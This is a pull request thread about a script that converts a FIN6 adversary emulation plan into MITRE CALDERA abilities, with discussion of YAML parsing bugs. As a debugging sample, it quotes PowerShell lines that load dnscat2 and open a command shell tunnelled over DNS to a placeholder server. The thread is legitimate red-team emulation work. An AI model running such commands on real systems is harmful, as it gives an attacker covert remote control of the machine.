### PR TITLE
add a script to convert Adversary Emulation Plan to MITRE CALDERA plugin

### PR DESCRIPTION
**Pull request by shiracamus**
I have created a script to convert CTID Adversary Emulation Plan's yaml to MITRE CALDERA plugin.
Unfortunately, running the adversary emulation plan on MITRE CALDERA's operations causes command to exit with an error.
If that's OK, please pull this.

### CODE REVIEW

**Comment by Cyb3rWard0g** [comment]
Hey @shiracamus , I tested the script and it works as expected to separate the main FIN6.yml to abilities, but there are a few things that could be added to help handle a few parts of the template properly:

* Order of key names for each ability. I added the following to the script and it displays the ability in the right format. When doing `yaml.safe_load`, it is ordering the keys. I added the following: https://github.com/OTRF/SimuLand/blob/master/environments/adversary-emulation-library/scripts/ctid-aep-caldera.py#L113

* Handling `#` in some command values. For example, the script does not handle these strings properly

https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/master/fin6/Emulation_Plan/FIN6.yaml#L716

Instead of displaying it like this after running script: `command: 'Start-Dnscat2 -Domain #{dnscat2_server} Exec cmd'`, it shows it as `command: Start-Dnscat2 -Domain`. That is because the `#` is not being escaped as several other variables defined in the template. 

* This is no the script, but since one tactic `lateral-movement` is defined with `-` and `_` in a few places, the script creates two folders for `lateral Movement`. I created an issue for it: https://github.com/center-for-threat-informed-defense/adversary_emulation_library/issues/26

**Comment by shiracamus** [comment]
> * Handling # in some command values. For example, the script does not handle these strings properly

It looks like Python's yaml library is dropping information. Hmmm

```python
>>> import yaml
>>> data = yaml.safe_load(open("FIN6.yaml"))
>>> ability = next(ability for ability in data if ability.get('id') == 'e74554b8-0bc9-3d50-95a4-e45421925b49')
>>> ability['platforms']
{'windows': {'psh': {'command': 'import-module #{file_path}\\\\dnscat2.ps1\nStart-Dnscat2 -Domain #{dnscat2_server} Exec cmd\n', 'payloads': ['dnscat2.ps1']}}}
>>> ability['executors']
[{'name': 'powershell', 'command': 'Start-Dnscat2 -Domain'}]
```

**Comment by shiracamus** [comment]
I was investigating the reason why the multi-line command in FIN6.yaml is displayed as one line in MITER CALDERA, but when defining a multi-line command, it seems that it is necessary to insert a blank line in yaml.
Is my perception correct?

**Comment by shiracamus** [comment]
Hi @Cyb3rWard0g,
> * Handling # in some command values. For example, the script does not handle these strings properly

I created an issue for thatt #31 
Thank you

**Pull request merged**
